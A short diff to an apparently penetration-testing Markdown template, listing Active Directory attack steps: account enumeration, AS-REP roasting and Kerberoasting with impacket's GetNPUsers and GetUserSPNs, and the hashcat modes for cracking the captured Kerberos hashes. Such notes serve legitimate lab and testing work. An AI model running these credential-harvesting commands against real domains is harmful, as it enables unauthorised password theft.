benrau87/doubletap/templates/windows-template.md

 Find accounts with enum4linux, crackmapexec, ldapsearch, other sources..

 Accounts but no pass
+Note: this only works is pre-auth is disabled
+1) Add the domain name to /etc/hosts
-python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py <domain> -no-pass -usersfile users.txt
+2) python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py DOMAIN/ -no-pass -usersfile users.txt
+3) python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py DOMAIN/USER -no-pass
-Note: this only works is pre-auth is disabled, these hashes will be in -m 18200 (Kerberos 5 AS-REP etype 23) in hashcat, you may have to add the domain name to /etc/hosts
+Note: these hashes will be in -m 18200 (Kerberos 5 AS-REP etype 23) in hashcat

 Accounts and pass
-impacket-GetUserSPNs -dc-ip <INSERTIPADDRESS> domain/username[:password] -request
+If you have a user, get service accounts from rpcclient enumdomusers impacket-GetUserSPNs -dc-ip INSERTIPADDRESS domain.local/username[:password] -request
 Note: these will be in hashcat -m 13100

 ```